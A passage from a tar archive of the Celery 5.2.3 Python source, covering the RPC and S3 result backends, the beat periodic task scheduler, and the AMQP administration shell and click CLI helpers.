is received, # but we don't have to cancel since we have one queue per process. pass def as_uri(self, include_password=True): return 'rpc://' def store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Send task return value and state.""" routing_key, correlation_id = self.destination_for(task_id, request) if not routing_key: return with self.app.amqp.producer_pool.acquire(block=True) as producer: producer.publish( self._to_result(task_id, state, result, traceback, request), exchange=self.exchange, routing_key=routing_key, correlation_id=correlation_id, serializer=self.serializer, retry=True, retry_policy=self.retry_policy, declare=self.on_reply_declare(task_id), delivery_mode=self.delivery_mode, ) return result def _to_result(self, task_id, state, result, traceback, request): return { 'task_id': task_id, 'status': state, 'result': self.encode_result(result, state), 'traceback': traceback, 'children': self.current_task_children(request), } def on_out_of_band_result(self, task_id, message): # Callback called when a reply for a task is received, # but we have no idea what do do with it. # Since the result is not pending, we put it in a separate # buffer: probably it will become pending later. if self.result_consumer: self.result_consumer.on_out_of_band_result(message) self._out_of_band[task_id] = message def get_task_meta(self, task_id, backlog_limit=1000): buffered = self._out_of_band.pop(task_id, None) if buffered: return self._set_cache_by_message(task_id, buffered) # Polling and using basic_get latest_by_id = {} prev = None for acc in self._slurp_from_queue(task_id, self.accept, backlog_limit): tid = self._get_message_task_id(acc) prev, latest_by_id[tid] = latest_by_id.get(tid), acc if prev: # backends aren't expected to keep history, # so we delete everything except the most recent state. prev.ack() prev = None latest = latest_by_id.pop(task_id, None) for tid, msg in latest_by_id.items(): self.on_out_of_band_result(tid, msg) if latest: latest.requeue() return self._set_cache_by_message(task_id, latest) else: # no new state, use previous try: return self._cache[task_id] except KeyError: # result probably pending. return {'status': states.PENDING, 'result': None} poll = get_task_meta # XXX compat def _set_cache_by_message(self, task_id, message): payload = self._cache[task_id] = self.meta_from_decoded( message.payload) return payload def _slurp_from_queue(self, task_id, accept, limit=1000, no_ack=False): with self.app.pool.acquire_channel(block=True) as (_, channel): binding = self._create_binding(task_id)(channel) binding.declare() for _ in range(limit): msg = binding.get(accept=accept, no_ack=no_ack) if not msg: break yield msg else: raise self.BacklogLimitExceeded(task_id) def _get_message_task_id(self, message): try: # try property first so we don't have to deserialize # the payload. return message.properties['correlation_id'] except (AttributeError, KeyError): # message sent by old Celery version, need to deserialize. return message.payload['task_id'] def revive(self, channel): pass def reload_task_result(self, task_id): raise NotImplementedError( 'reload_task_result is not supported by this backend.') def reload_group_result(self, task_id): """Reload group result, even if it has been previously fetched.""" raise NotImplementedError( 'reload_group_result is not supported by this backend.') def save_group(self, group_id, result): raise NotImplementedError( 'save_group is not supported by this backend.') def restore_group(self, group_id, cache=True): raise NotImplementedError( 'restore_group is not supported by this backend.') def delete_group(self, group_id): raise NotImplementedError( 'delete_group is not supported by this backend.') def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs return super().__reduce__(args, dict( kwargs, connection=self._connection, exchange=self.exchange.name, exchange_type=self.exchange.type, persistent=self.persistent, serializer=self.serializer, auto_delete=self.auto_delete, expires=self.expires, )) @property def binding(self): return self.Queue( self.oid, self.exchange, self.oid, durable=False, auto_delete=True, expires=self.expires, ) @cached_property def oid(self): # cached here is the app thread OID: name of queue we receive results on. return self.app.thread_oid ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/s3.py0000664000175000017500000000530000000000000016627 0ustar00asifasif00000000000000"""s3 result store backend.""" from kombu.utils.encoding import bytes_to_str from celery.exceptions import ImproperlyConfigured from .base import KeyValueStoreBackend try: import boto3 import botocore except ImportError: boto3 = None botocore = None __all__ = ('S3Backend',) class S3Backend(KeyValueStoreBackend): """An S3 task result store. Raises: celery.exceptions.ImproperlyConfigured: if module :pypi:`boto3` is not available, if the :setting:`aws_access_key_id` or setting:`aws_secret_access_key` are not set, or it the :setting:`bucket` is not set. """ def __init__(self, **kwargs): super().__init__(**kwargs) if not boto3 or not botocore: raise ImproperlyConfigured('You must install boto3' 'to use s3 backend') conf = self.app.conf self.endpoint_url = conf.get('s3_endpoint_url', None) self.aws_region = conf.get('s3_region', None) self.aws_access_key_id = conf.get('s3_access_key_id', None) self.aws_secret_access_key = conf.get('s3_secret_access_key', None) self.bucket_name = conf.get('s3_bucket', None) if not self.bucket_name: raise ImproperlyConfigured('Missing bucket name') self.base_path = conf.get('s3_base_path', None) self._s3_resource = self._connect_to_s3() def _get_s3_object(self, key): key_bucket_path = self.base_path + key if self.base_path else key return self._s3_resource.Object(self.bucket_name, key_bucket_path) def get(self, key): key = bytes_to_str(key) s3_object = self._get_s3_object(key) try: s3_object.load() data = s3_object.get()['Body'].read() return data if self.content_encoding == 'binary' else data.decode('utf-8') except botocore.exceptions.ClientError as error: if error.response['Error']['Code'] == "404": return None raise error def set(self, key, value): key = bytes_to_str(key) s3_object = self._get_s3_object(key) s3_object.put(Body=value) def delete(self, key): key = bytes_to_str(key) s3_object = self._get_s3_object(key) s3_object.delete() def _connect_to_s3(self): session = boto3.Session( aws_access_key_id=self.aws_access_key_id, aws_secret_access_key=self.aws_secret_access_key, region_name=self.aws_region ) if session.get_credentials() is None: raise ImproperlyConfigured('Missing aws s3 creds') return session.resource('s3', endpoint_url=self.endpoint_url) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/beat.py0000664000175000017500000005753500000000000015464 0ustar00asifasif00000000000000"""The periodic task scheduler.""" import copy import errno import heapq import os import shelve import sys import time import traceback from calendar import timegm from collections import namedtuple from functools import total_ordering from threading import Event, Thread from billiard import ensure_multiprocessing from billiard.common import reset_signals from billiard.context import Process from kombu.utils.functional import maybe_evaluate, reprcall from kombu.utils.objects import cached_property from . import __version__, platforms, signals from .exceptions import reraise from .schedules import crontab, maybe_schedule from .utils.imports import load_extension_class_names, symbol_by_name from .utils.log import get_logger, iter_open_logger_fds from .utils.time import humanize_seconds, maybe_make_aware __all__ = ( 'SchedulingError', 'ScheduleEntry', 'Scheduler', 'PersistentScheduler', 'Service', 'EmbeddedService', ) event_t = namedtuple('event_t', ('time', 'priority', 'entry')) logger = get_logger(__name__) debug, info, error, warning = (logger.debug, logger.info, logger.error, logger.warning) DEFAULT_MAX_INTERVAL = 300 # 5 minutes class SchedulingError(Exception): """An error occurred while scheduling a task.""" class BeatLazyFunc: """An lazy function declared in 'beat_schedule' and called before sending to worker. Example: beat_schedule = { 'test-every-5-minutes': { 'task': 'test', 'schedule': 300, 'kwargs': { "current": BeatCallBack(datetime.datetime.now) } } } """ def __init__(self, func, *args, **kwargs): self._func = func self._func_params = { "args": args, "kwargs": kwargs } def __call__(self): return self.delay() def delay(self): return self._func(*self._func_params["args"], **self._func_params["kwargs"]) @total_ordering class ScheduleEntry: """An entry in the scheduler. Arguments: name (str): see :attr:`name`. schedule (~celery.schedules.schedule): see :attr:`schedule`. args (Tuple): see :attr:`args`. kwargs (Dict): see :attr:`kwargs`. options (Dict): see :attr:`options`. last_run_at (~datetime.datetime): see :attr:`last_run_at`. total_run_count (int): see :attr:`total_run_count`. relative (bool): Is the time relative to when the server starts? """ #: The task name name = None #: The schedule (:class:`~celery.schedules.schedule`) schedule = None #: Positional arguments to apply. args = None #: Keyword arguments to apply. kwargs = None #: Task execution options. options = None #: The time and date of when this task was last scheduled. last_run_at = None #: Total number of times this task has been scheduled. total_run_count = 0 def __init__(self, name=None, task=None, last_run_at=None, total_run_count=None, schedule=None, args=(), kwargs=None, options=None, relative=False, app=None): self.app = app self.name = name self.task = task self.args = args self.kwargs = kwargs if kwargs else {} self.options = options if options else {} self.schedule = maybe_schedule(schedule, relative, app=self.app) self.last_run_at = last_run_at or self.default_now() self.total_run_count = total_run_count or 0 def default_now(self): return self.schedule.now() if self.schedule else self.app.now() _default_now = default_now # compat def _next_instance(self, last_run_at=None): """Return new instance, with date and count fields updated.""" return self.__class__(**dict( self, last_run_at=last_run_at or self.default_now(), total_run_count=self.total_run_count + 1, )) __next__ = next = _next_instance # for 2to3 def __reduce__(self): return self.__class__, ( self.name, self.task, self.last_run_at, self.total_run_count, self.schedule, self.args, self.kwargs, self.options, ) def update(self, other): """Update values from another entry. Will only update "editable" fields: ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. """ self.__dict__.update({ 'task': other.task, 'schedule': other.schedule, 'args': other.args, 'kwargs': other.kwargs, 'options': other.options, }) def is_due(self): """See :meth:`~celery.schedule.schedule.is_due`.""" return self.schedule.is_due(self.last_run_at) def __iter__(self): return iter(vars(self).items()) def __repr__(self): return '<{name}: {0.name} {call} {0.schedule}'.format( self, call=reprcall(self.task, self.args or (), self.kwargs or {}), name=type(self).__name__, ) def __lt__(self, other): if isinstance(other, ScheduleEntry): # How the object is ordered doesn't really matter, as # in the scheduler heap, the order is decided by the # preceding members of the tuple ``(time, priority, entry)``. # # If all that's left to order on is the entry then it can # just as well be random. return id(self) < id(other) return NotImplemented def editable_fields_equal(self, other): for attr in ('task', 'args', 'kwargs', 'options', 'schedule'): if getattr(self, attr) != getattr(other, attr): return False return True def __eq__(self, other): """Test schedule entries equality. Will only compare "editable" fields: ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. """ return self.editable_fields_equal(other) def __ne__(self, other): """Test schedule entries inequality. Will only compare "editable" fields: ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. """ return not self == other def _evaluate_entry_args(entry_args): if not entry_args: return [] return [ v() if isinstance(v, BeatLazyFunc) else v for v in entry_args ] def _evaluate_entry_kwargs(entry_kwargs): if not entry_kwargs: return {} return { k: v() if isinstance(v, BeatLazyFunc) else v for k, v in entry_kwargs.items() } class Scheduler: """Scheduler for periodic tasks. The :program:`celery beat` program may instantiate this class multiple times for introspection purposes, but then with the ``lazy`` argument set. It's important for subclasses to be idempotent when this argument is set. Arguments: schedule (~celery.schedules.schedule): see :attr:`schedule`. max_interval (int): see :attr:`max_interval`. lazy (bool): Don't set up the schedule. """ Entry = ScheduleEntry #: The schedule dict/shelve. schedule = None #: Maximum time to sleep between re-checking the schedule. max_interval = DEFAULT_MAX_INTERVAL #: How often to sync the schedule (3 minutes by default) sync_every = 3 * 60 #: How many tasks can be called before a sync is forced. sync_every_tasks = None _last_sync = None _tasks_since_sync = 0 logger = logger # compat def __init__(self, app, schedule=None, max_interval=None, Producer=None, lazy=False, sync_every_tasks=None, **kwargs): self.app = app self.data = maybe_evaluate({} if schedule is None else schedule) self.max_interval = (max_interval or app.conf.beat_max_loop_interval or self.max_interval) self.Producer = Producer or app.amqp.Producer self._heap = None self.old_schedulers = None self.sync_every_tasks = ( app.conf.beat_sync_every if sync_every_tasks is None else sync_every_tasks) if not lazy: self.setup_schedule() def install_default_entries(self, data): entries = {} if self.app.conf.result_expires and \ not self.app.backend.supports_autoexpire: if 'celery.backend_cleanup' not in data: entries['celery.backend_cleanup'] = { 'task': 'celery.backend_cleanup', 'schedule': crontab('0', '4', '*'), 'options': {'expires': 12 * 3600}} self.update_from_dict(entries) def apply_entry(self, entry, producer=None): info('Scheduler: Sending due task %s (%s)', entry.name, entry.task) try: result = self.apply_async(entry, producer=producer, advance=False) except Exception as exc: # pylint: disable=broad-except error('Message Error: %s\n%s', exc, traceback.format_stack(), exc_info=True) else: debug('%s sent. id->%s', entry.task, result.id) def adjust(self, n, drift=-0.010): if n and n > 0: return n + drift return n def is_due(self, entry): return entry.is_due() def _when(self, entry, next_time_to_run, mktime=timegm): """Return a utc timestamp, make sure heapq in currect order.""" adjust = self.adjust as_now = maybe_make_aware(entry.default_now()) return (mktime(as_now.utctimetuple()) + as_now.microsecond / 1e6 + (adjust(next_time_to_run) or 0)) def populate_heap(self, event_t=event_t, heapify=heapq.heapify): """Populate the heap with the data contained in the schedule.""" priority = 5 self._heap = [] for entry in self.schedule.values(): is_due, next_call_delay = entry.is_due() self._heap.append(event_t( self._when( entry, 0 if is_due else next_call_delay ) or 0, priority, entry )) heapify(self._heap) # pylint disable=redefined-outer-name def tick(self, event_t=event_t, min=min, heappop=heapq.heappop, heappush=heapq.heappush): """Run a tick - one iteration of the scheduler. Executes one due task per call. Returns: float: preferred delay in seconds for next call. """ adjust = self.adjust max_interval = self.max_interval if (self._heap is None or not self.schedules_equal(self.old_schedulers, self.schedule)): self.old_schedulers = copy.copy(self.schedule) self.populate_heap() H = self._heap if not H: return max_interval event = H[0] entry = event[2] is_due, next_time_to_run = self.is_due(entry) if is_due: verify = heappop(H) if verify is event: next_entry = self.reserve(entry) self.apply_entry(entry, producer=self.producer) heappush(H, event_t(self._when(next_entry, next_time_to_run), event[1], next_entry)) return 0 else: heappush(H, verify) return min(verify[0], max_interval) return min(adjust(next_time_to_run) or max_interval, max_interval) def schedules_equal(self, old_schedules, new_schedules): if old_schedules is new_schedules is None: return True if old_schedules is None or new_schedules is None: return False if set(old_schedules.keys()) != set(new_schedules.keys()): return False for name, old_entry in old_schedules.items(): new_entry = new_schedules.get(name) if not new_entry: return False if new_entry != old_entry: return False return True def should_sync(self): return ( (not self._last_sync or (time.monotonic() - self._last_sync) > self.sync_every) or (self.sync_every_tasks and self._tasks_since_sync >= self.sync_every_tasks) ) def reserve(self, entry): new_entry = self.schedule[entry.name] = next(entry) return new_entry def apply_async(self, entry, producer=None, advance=True, **kwargs): # Update time-stamps and run counts before we actually execute, # so we have that done if an exception is raised (doesn't schedule # forever.) entry = self.reserve(entry) if advance else entry task = self.app.tasks.get(entry.task) try: entry_args = _evaluate_entry_args(entry.args) entry_kwargs = _evaluate_entry_kwargs(entry.kwargs) if task: return task.apply_async(entry_args, entry_kwargs, producer=producer, **entry.options) else: return self.send_task(entry.task, entry_args, entry_kwargs, producer=producer, **entry.options) except Exception as exc: # pylint: disable=broad-except reraise(SchedulingError, SchedulingError( "Couldn't apply scheduled task {0.name}: {exc}".format( entry, exc=exc)), sys.exc_info()[2]) finally: self._tasks_since_sync += 1 if self.should_sync(): self._do_sync() def send_task(self, *args, **kwargs): return self.app.send_task(*args, **kwargs) def setup_schedule(self): self.install_default_entries(self.data) self.merge_inplace(self.app.conf.beat_schedule) def _do_sync(self): try: debug('beat: Synchronizing schedule...') self.sync() finally: self._last_sync = time.monotonic() self._tasks_since_sync = 0 def sync(self): pass def close(self): self.sync() def add(self, **kwargs): entry = self.Entry(app=self.app, **kwargs) self.schedule[entry.name] = entry return entry def _maybe_entry(self, name, entry): if isinstance(entry, self.Entry): entry.app = self.app return entry return self.Entry(**dict(entry, name=name, app=self.app)) def update_from_dict(self, dict_): self.schedule.update({ name: self._maybe_entry(name, entry) for name, entry in dict_.items() }) def merge_inplace(self, b): schedule = self.schedule A, B = set(schedule), set(b) # Remove items from disk not in the schedule anymore. for key in A ^ B: schedule.pop(key, None) # Update and add new items in the schedule for key in B: entry = self.Entry(**dict(b[key], name=key, app=self.app)) if schedule.get(key): schedule[key].update(entry) else: schedule[key] = entry def _ensure_connected(self): # callback called for each retry while the connection # can't be established. def _error_handler(exc, interval): error('beat: Connection error: %s. ' 'Trying again in %s seconds...', exc, interval) return self.connection.ensure_connection( _error_handler, self.app.conf.broker_connection_max_retries ) def get_schedule(self): return self.data def set_schedule(self, schedule): self.data = schedule schedule = property(get_schedule, set_schedule) @cached_property def connection(self): return self.app.connection_for_write() @cached_property def producer(self): return self.Producer(self._ensure_connected(), auto_declare=False) @property def info(self): return '' class PersistentScheduler(Scheduler): """Scheduler backed by :mod:`shelve` database.""" persistence = shelve known_suffixes = ('', '.db', '.dat', '.bak', '.dir') _store = None def __init__(self, *args, **kwargs): self.schedule_filename = kwargs.get('schedule_filename') super().__init__(*args, **kwargs) def _remove_db(self): for suffix in self.known_suffixes: with platforms.ignore_errno(errno.ENOENT): os.remove(self.schedule_filename + suffix) def _open_schedule(self): return self.persistence.open(self.schedule_filename, writeback=True) def _destroy_open_corrupted_schedule(self, exc): error('Removing corrupted schedule file %r: %r', self.schedule_filename, exc, exc_info=True) self._remove_db() return self._open_schedule() def setup_schedule(self): try: self._store = self._open_schedule() # In some cases there may be different errors from a storage # backend for corrupted files. Example - DBPageNotFoundError # exception from bsddb. In such case the file will be # successfully opened but the error will be raised on first key # retrieving. self._store.keys() except Exception as exc: # pylint: disable=broad-except self._store = self._destroy_open_corrupted_schedule(exc) self._create_schedule() tz = self.app.conf.timezone stored_tz = self._store.get('tz') if stored_tz is not None and stored_tz != tz: warning('Reset: Timezone changed from %r to %r', stored_tz, tz) self._store.clear() # Timezone changed, reset db! utc = self.app.conf.enable_utc stored_utc = self._store.get('utc_enabled') if stored_utc is not None and stored_utc != utc: choices = {True: 'enabled', False: 'disabled'} warning('Reset: UTC changed from %s to %s', choices[stored_utc], choices[utc]) self._store.clear() # UTC setting changed, reset db! entries = self._store.setdefault('entries', {}) self.merge_inplace(self.app.conf.beat_schedule) self.install_default_entries(self.schedule) self._store.update({ '__version__': __version__, 'tz': tz, 'utc_enabled': utc, }) self.sync() debug('Current schedule:\n' + '\n'.join( repr(entry) for entry in entries.values())) def _create_schedule(self): for _ in (1, 2): try: self._store['entries'] except KeyError: # new schedule db try: self._store['entries'] = {} except KeyError as exc: self._store = self._destroy_open_corrupted_schedule(exc) continue else: if '__version__' not in self._store: warning('DB Reset: Account for new __version__ field') self._store.clear() # remove schedule at 2.2.2 upgrade. elif 'tz' not in self._store: warning('DB Reset: Account for new tz field') self._store.clear() # remove schedule at 3.0.8 upgrade elif 'utc_enabled' not in self._store: warning('DB Reset: Account for new utc_enabled field') self._store.clear() # remove schedule at 3.0.9 upgrade break def get_schedule(self): return self._store['entries'] def set_schedule(self, schedule): self._store['entries'] = schedule schedule = property(get_schedule, set_schedule) def sync(self): if self._store is not None: self._store.sync() def close(self): self.sync() self._store.close() @property def info(self): return f' . db -> {self.schedule_filename}' class Service: """Celery periodic task service.""" scheduler_cls = PersistentScheduler def __init__(self, app, max_interval=None, schedule_filename=None, scheduler_cls=None): self.app = app self.max_interval = (max_interval or app.conf.beat_max_loop_interval) self.scheduler_cls = scheduler_cls or self.scheduler_cls self.schedule_filename = ( schedule_filename or app.conf.beat_schedule_filename) self._is_shutdown = Event() self._is_stopped = Event() def __reduce__(self): return self.__class__, (self.max_interval, self.schedule_filename, self.scheduler_cls, self.app) def start(self, embedded_process=False): info('beat: Starting...') debug('beat: Ticking with max interval->%s', humanize_seconds(self.scheduler.max_interval)) signals.beat_init.send(sender=self) if embedded_process: signals.beat_embedded_init.send(sender=self) platforms.set_process_title('celery beat') try: while not self._is_shutdown.is_set(): interval = self.scheduler.tick() if interval and interval > 0.0: debug('beat: Waking up %s.', humanize_seconds(interval, prefix='in ')) time.sleep(interval) if self.scheduler.should_sync(): self.scheduler._do_sync() except (KeyboardInterrupt, SystemExit): self._is_shutdown.set() finally: self.sync() def sync(self): self.scheduler.close() self._is_stopped.set() def stop(self, wait=False): info('beat: Shutting down...') self._is_shutdown.set() wait and self._is_stopped.wait() # block until shutdown done. def get_scheduler(self, lazy=False, extension_namespace='celery.beat_schedulers'): filename = self.schedule_filename aliases = dict( load_extension_class_names(extension_namespace) or {}) return symbol_by_name(self.scheduler_cls, aliases=aliases)( app=self.app, schedule_filename=filename, max_interval=self.max_interval, lazy=lazy, ) @cached_property def scheduler(self): return self.get_scheduler() class _Threaded(Thread): """Embedded task scheduler using threading.""" def __init__(self, app, **kwargs): super().__init__() self.app = app self.service = Service(app, **kwargs) self.daemon = True self.name = 'Beat' def run(self): self.app.set_current() self.service.start() def stop(self): self.service.stop(wait=True) try: ensure_multiprocessing() except NotImplementedError: # pragma: no cover _Process = None else: class _Process(Process): def __init__(self, app, **kwargs): super().__init__() self.app = app self.service = Service(app, **kwargs) self.name = 'Beat' def run(self): reset_signals(full=False) platforms.close_open_fds([ sys.__stdin__, sys.__stdout__, sys.__stderr__, ] + list(iter_open_logger_fds())) self.app.set_default() self.app.set_current() self.service.start(embedded_process=True) def stop(self): self.service.stop() self.terminate() def EmbeddedService(app, max_interval=None, **kwargs): """Return embedded clock service. Arguments: thread (bool): Run threaded instead of as a separate process. Uses :mod:`multiprocessing` by default, if available. """ if kwargs.pop('thread', False) or _Process is None: # Need short max interval to be able to stop thread # in reasonable time. return _Threaded(app, max_interval=1, **kwargs) return _Process(app, max_interval=max_interval, **kwargs) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4237502 celery-5.2.3/celery/bin/0000775000175000017500000000000000000000000014730 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/__init__.py0000664000175000017500000000000000000000000017027 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/amqp.py0000664000175000017500000002345600000000000016252 0ustar00asifasif00000000000000"""AMQP 0.9.1 REPL.""" import pprint import click from amqp import Connection, Message from click_repl import register_repl __all__ = ('amqp',) from celery.bin.base import handle_preload_options def dump_message(message): if message is None: return 'No messages in queue. basic.publish something.' return {'body': message.body, 'properties': message.properties, 'delivery_info': message.delivery_info} class AMQPContext: def __init__(self, cli_context): self.cli_context = cli_context self.connection = self.cli_context.app.connection() self.channel = None self.reconnect() @property def app(self): return self.cli_context.app def respond(self, retval): if isinstance(retval, str): self.cli_context.echo(retval) else: self.cli_context.echo(pprint.pformat(retval)) def echo_error(self, exception): self.cli_context.error(f'{self.cli_context.ERROR}: {exception}') def echo_ok(self): self.cli_context.echo(self.cli_context.OK) def reconnect(self): if self.connection: self.connection.close() else: self.connection = self.cli_context.app.connection() self.cli_context.echo(f'-> connecting to {self.connection.as_uri()}.') try: self.connection.connect() except (ConnectionRefusedError, ConnectionResetError) as e: self.echo_error(e) else: self.cli_context.secho('-> connected.', fg='green', bold=True) self.channel = self.connection.default_channel @click.group(invoke_without_command=True) @click.pass_context @handle_preload_options def amqp(ctx): """AMQP Administration Shell. Also works for non-AMQP transports (but not ones that store declarations in memory). """ if not isinstance(ctx.obj, AMQPContext): ctx.obj = AMQPContext(ctx.obj) @amqp.command(name='exchange.declare') @click.argument('exchange', type=str) @click.argument('type', type=str) @click.argument('passive', type=bool, default=False) @click.argument('durable', type=bool, default=False) @click.argument('auto_delete', type=bool, default=False) @click.pass_obj def exchange_declare(amqp_context, exchange, type, passive, durable, auto_delete): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: amqp_context.channel.exchange_declare(exchange=exchange, type=type, passive=passive, durable=durable, auto_delete=auto_delete) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() @amqp.command(name='exchange.delete') @click.argument('exchange', type=str) @click.argument('if_unused', type=bool) @click.pass_obj def exchange_delete(amqp_context, exchange, if_unused): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: amqp_context.channel.exchange_delete(exchange=exchange, if_unused=if_unused) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() @amqp.command(name='queue.bind') @click.argument('queue', type=str) @click.argument('exchange', type=str) @click.argument('routing_key', type=str) @click.pass_obj def queue_bind(amqp_context, queue, exchange, routing_key): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: amqp_context.channel.queue_bind(queue=queue, exchange=exchange, routing_key=routing_key) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() @amqp.command(name='queue.declare') @click.argument('queue', type=str) @click.argument('passive', type=bool, default=False) @click.argument('durable', type=bool, default=False) @click.argument('auto_delete', type=bool, default=False) @click.pass_obj def queue_declare(amqp_context, queue, passive, durable, auto_delete): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: retval = amqp_context.channel.queue_declare(queue=queue, passive=passive, durable=durable, auto_delete=auto_delete) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.cli_context.secho( 'queue:{} messages:{} consumers:{}'.format(*retval), fg='cyan', bold=True) amqp_context.echo_ok() @amqp.command(name='queue.delete') @click.argument('queue', type=str) @click.argument('if_unused', type=bool, default=False) @click.argument('if_empty', type=bool, default=False) @click.pass_obj def queue_delete(amqp_context, queue, if_unused, if_empty): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: retval = amqp_context.channel.queue_delete(queue=queue, if_unused=if_unused, if_empty=if_empty) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.cli_context.secho( f'{retval} messages deleted.', fg='cyan', bold=True) amqp_context.echo_ok() @amqp.command(name='queue.purge') @click.argument('queue', type=str) @click.pass_obj def queue_purge(amqp_context, queue): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: retval = amqp_context.channel.queue_purge(queue=queue) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.cli_context.secho( f'{retval} messages deleted.', fg='cyan', bold=True) amqp_context.echo_ok() @amqp.command(name='basic.get') @click.argument('queue', type=str) @click.argument('no_ack', type=bool, default=False) @click.pass_obj def basic_get(amqp_context, queue, no_ack): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: message = amqp_context.channel.basic_get(queue, no_ack=no_ack) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.respond(dump_message(message)) amqp_context.echo_ok() @amqp.command(name='basic.publish') @click.argument('msg', type=str) @click.argument('exchange', type=str) @click.argument('routing_key', type=str) @click.argument('mandatory', type=bool, default=False) @click.argument('immediate', type=bool, default=False) @click.pass_obj def basic_publish(amqp_context, msg, exchange, routing_key, mandatory, immediate): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: # XXX Hack to fix Issue #2013 if isinstance(amqp_context.connection.connection, Connection): msg = Message(msg) try: amqp_context.channel.basic_publish(msg, exchange=exchange, routing_key=routing_key, mandatory=mandatory, immediate=immediate) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() @amqp.command(name='basic.ack') @click.argument('delivery_tag', type=int) @click.pass_obj def basic_ack(amqp_context, delivery_tag): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: amqp_context.channel.basic_ack(delivery_tag) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() repl = register_repl(amqp) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/base.py0000664000175000017500000002053700000000000016223 0ustar00asifasif00000000000000"""Click customizations for Celery.""" import json import numbers from collections import OrderedDict from functools import update_wrapper from pprint import pformat import click from click import ParamType from kombu.utils.objects import cached_property from celery._state import get_current_app from celery.signals import user_preload_options from celery.utils import text from celery.utils.log import mlevel from celery.utils.time import maybe_iso8601 try: from pygments import highlight from pygments.formatters import Terminal256Formatter from pygments.lexers import PythonLexer except ImportError: def highlight(s, *args, **kwargs): """Place holder function in case pygments is missing.""" return s LEXER = None FORMATTER = None else: LEXER = PythonLexer() FORMATTER = Terminal256Formatter() class CLIContext: """Context Object for the CLI.""" def __init__(self, app, no_color, workdir, quiet=False): """Initialize the CLI context.""" self.app = app or get_current_app() self.no_color = no_color self.quiet = quiet self.workdir = workdir @cached_property def OK(self): return self.style("OK", fg="green", bold=True) @cached_property def ERROR(self): return self.style("ERROR", fg="red", bold=True) def style(self, message=None, **kwargs): if self.no_color: return message else: return click.style(message, **kwargs) def secho(self, message=None, **kwargs): if self.no_color: kwargs['color'] = False click.echo(message, **kwargs) else: click.secho(message, **kwargs) def echo(self, message=None, **kwargs): if self.no_color: kwargs['color'] = False click.echo(message, **kwargs) else: click.echo(message, **kwargs) def error(self, message=None, **kwargs): kwargs['err'] = True if self.no_color: kwargs['color'] = False click.echo(message, **kwargs) else: click.secho(message, **kwargs) def pretty(self, n): if isinstance(n, list): return self.OK, self.pretty_list(n) if isinstance(n, dict): if 'ok' in n or 'error' in n: return self.pretty_dict_ok_error(n) else: s = json.dumps(n, sort_keys=True, indent=4) if not self.no_color: s = highlight(s, LEXER, FORMATTER) return self.OK, s if isinstance(n, str): return self.OK, n return self.OK, pformat(n) def pretty_list(self, n): if not n: return '- empty -' return '\n'.join( f'{self.style("*", fg="white")} {item}' for item in n ) def pretty_dict_ok_error(self, n): try: return (self.OK, text.indent(self.pretty(n['ok'])[1], 4)) except KeyError: pass return (self.ERROR, text.indent(self.pretty(n['error'])[1], 4)) def say_chat(self, direction, title, body='', show_body=False): if direction == '<-' and self.quiet: return dirstr = not self.quiet and f'{self.style(direction, fg="white", bold=True)} ' or '' self.echo(f'{dirstr} {title}') if body and show_body: self.echo(body) def handle_preload_options(f): """Extract preload options and return a wrapped callable.""" def caller(ctx, *args, **kwargs): app = ctx.obj.app preload_options = [o.name for o in app.user_options.get('preload', [])] if preload_options: user_options = { preload_option: kwargs[preload_option] for preload_option in preload_options } user_preload_options.send(sender=f, app=app, options=user_options) return f(ctx, *args, **kwargs) return update_wrapper(caller, f) class CeleryOption(click.Option): """Customized option for Celery.""" def get_default(self, ctx, *args, **kwargs): if self.default_value_from_context: self.default = ctx.obj[self.default_value_from_context] return super().get_default(ctx, *args, **kwargs) def __init__(self, *args, **kwargs): """Initialize a Celery option.""" self.help_group = kwargs.pop('help_group', None) self.default_value_from_context = kwargs.pop('default_value_from_context', None) super().__init__(*args, **kwargs) class CeleryCommand(click.Command): """Customized command for Celery.""" def format_options(self, ctx, formatter): """Write all the options into the formatter if they exist.""" opts = OrderedDict() for param in self.get_params(ctx): rv = param.get_help_record(ctx) if rv is not None: if hasattr(param, 'help_group') and 